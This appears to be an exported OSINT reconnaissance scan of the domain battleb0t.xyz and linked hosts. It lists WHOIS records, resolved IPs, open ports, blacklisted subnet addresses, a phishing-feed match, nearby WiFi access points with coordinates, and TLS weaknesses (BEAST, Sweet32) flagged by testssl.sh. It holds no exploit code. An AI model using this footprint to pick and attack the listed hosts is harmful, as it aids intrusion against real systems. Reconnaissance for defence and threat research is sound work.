automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | ecash-pay.com |
| 2023-05-12 03:03:27 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | nwapi.battleb0t.xyz |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.203): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 5526 7041 (Net ID: 00:00:C5:B5:6E:E5) | 41.8781, -87.6298 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.217): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:02 | Blacklisted Affiliate IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/87.248.157.93 | 87.248.157.93 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Belkin_G_Wireless_ (Net ID: 00:1C:DF:B6:B6:F1) | 32.8608, -79.9746 |
| 2023-05-12 03:31:34 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@gmo.jp | Domain Name: AYHA.XYZ
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2022-04-30T16:37:38.0Z
Creation Date: 2022-04-25T16:34:12.0Z
Registry Expiry Date: 2024-04-25T23:59:59.0Z
Registrar: GMO Internet Group, Inc. d/b/a Onamae.com
Registrar IANA ID: 49
Domain Status: ok https://icann.org/epp#ok
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant State/Province: Tokyo
Registrant Country: JP
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.GM111.PARKLOGIC.COM
Name Server: NS2.GM111.PARKLOGIC.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayha.xyz
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2023-04-26T06:12:30Z
Creation Date: 2022-04-25T16:34:14Z
Registrar Registration Expiration Date: 2023-04-25T23:59:59Z
Registrar: GMO INTERNET, INC.
Registrar IANA ID: 49
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: E4D57C1767DC8C
Registrant Name: Whois Privacy Protection Service by onamae.com
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant Street: 26-1 Sakuragaoka-cho
Registrant Street: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State/Province: Tokyo
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: +81.354562560
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: proxy@whoisprotectservice.com
Registry Admin ID: E4D57C3C00BE9C
Admin Name: Whois Privacy Protection Service by onamae.com
Admin Organization: Whois Privacy Protection Service by onamae.com
Admin Street: 26-1 Sakuragaoka-cho
Admin Street: Cerulean Tower 11F
Admin City: Shibuya-ku
Admin State/Province: Tokyo
Admin Postal Code: 150-8512
Admin Country: JP
Admin Phone: +81.354562560
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: proxy@whoisprotectservice.com
Registry Tech ID: E4D27D6C252D99
Tech Name: Whois Privacy Protection Service by onamae.com
Tech Organization: Whois Privacy Protection Service by onamae.com
Tech Street: 26-1 Sakuragaoka-cho
Tech Street: Cerulean Tower 11F
Tech City: Shibuya-ku
Tech State/Province: Tokyo
Tech Postal Code: 150-8512
Tech Country: JP
Tech Phone: +81.354562560
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: proxy@whoisprotectservice.com
Name Server: ns1.gm111.parklogic.com
Name Server: ns2.gm111.parklogic.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-04-26T06:12:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:10:00 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | netherlands-18708423.mongo.ondigitalocean.com | 165.232.113.94 |
| 2023-05-12 03:00:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.21): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F3:6A:27) | 41.8781, -87.6298 |
| 2023-05-12 02:46:17 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | San Francisco, United States | 172.67.168.252 |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:80 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 02:30:14 (Net ID: 00:02:2D:03:B5:67) | 37.7642, -122.3993 |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:80 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:D1:F0:AA:05) | 41.8781, -87.6298 |
| 2023-05-12 03:12:41 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | 188.114.97.1 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 73 | 0 | 2 | 0 | None | 34.148.97.127 | funny.battleb0t.xyz |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namesilo.com | Domain Name: AAHU.XYZ
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-06-06T11:23:48.0Z
Creation Date: 2022-04-10T16:51:06.0Z
Registry Expiry Date: 2024-04-10T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: LINDA.NS.GIANTPANDA.COM
Name Server: VIVIAN.NS.GIANTPANDA.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:36.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: aahu.xyz
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com/
Updated Date: 2023-04-10T07:00:00Z
Creation Date: 2022-04-10T07:00:00Z
Registrar Registration Expiration Date: 2023-04-10T07:00:00Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Registrant City: Phoenix
Registrant State/Province: AZ
Registrant Postal Code: 85016
Registrant Country: US
Registrant Phone: +1.3478717726
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Admin City: Phoenix
Admin State/Province: AZ
Admin Postal Code: 85016
Admin Country: US
Admin Phone: +1.3478717726
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: See PrivacyGuardian.org
Tech Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Tech City: Phoenix
Tech State/Province: AZ
Tech Postal Code: 85016
Tech Country: US
Tech Phone: +1.3478717726
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Name Server: hugh.ns.cloudflare.com
Name Server: ryleigh.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:00:00Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
database through the use of high-volume, automated, electronic processes. The
Data in our WHOIS database is provided for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. We do not guarantee its accuracy. By submitting a WHOIS
query, you agree to abide by the following terms of use: You agree that you may
use this Data only for lawful purposes and that under no circumstances will you
use this Data to: (1) allow, enable, or otherwise support the transmission of
mass unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes that
apply to us (or our computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without our
prior written consent. We reserve the right to terminate your access to the
WHOIS database at our sole discretion, including without limitation, for
excessive querying of the WHOIS database or for failure to otherwise abide by
this policy. We reserve the right to modify these terms at any time.
Domains - cheap, easy, and secure at NameSilo.com
https://www.namesilo.com
Register your domain now at www.NameSilo.com - Domains. Cheap, Fast and Secure
|
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=funny.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:56:19 | Netblock Membership | No | RIPE | 0 | 0 | 2 | 0 | None | 188.114.97.0/24 | 188.114.97.1 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 0.dontkillmyapp.com | 185.199.111.153 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | nwapi.battleb0t.xyz |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@namecheap.com | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.117): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551572EC4 (Net ID: 00:01:E3:57:2E:C4) | 52.3759, 4.8975 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:26:F3:E2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0036labs.github.io]
https://www.openphish.com/feed.txt | 0036labs.github.io |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | abuse@namecheap.com | Domain Name: CLOUDWAYSAPPS.COM
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-09-12T18:44:13Z
Creation Date: 2012-01-04T12:17:34Z
Registry Expiry Date: 2028-01-04T12:17:34Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-2016.AWSDNS-60.CO.UK
Name Server: NS-222.AWSDNS-27.COM
Name Server: NS-854.AWSDNS-42.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: cloudwaysapps.com
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-06-22T11:27:03.11Z
Creation Date: 2012-01-04T12:17:34.00Z
Registrar Registration Expiration Date: 2028-01-04T12:17:34.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Name Server: ns-222.awsdns-27.com
Name Server: ns-854.awsdns-42.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-2016.awsdns-60.co.uk
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T06:41:09.59Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:55:25 | Social Media Presence | No | Social Network Identifier | 0 | 0 | 4 | 0 | None | Github: https://github.com/Altpapier/SkyHelperAPI/tree/master/examples | https://github.com/Altpapier/SkyHelperAPI/tree/master/examples |
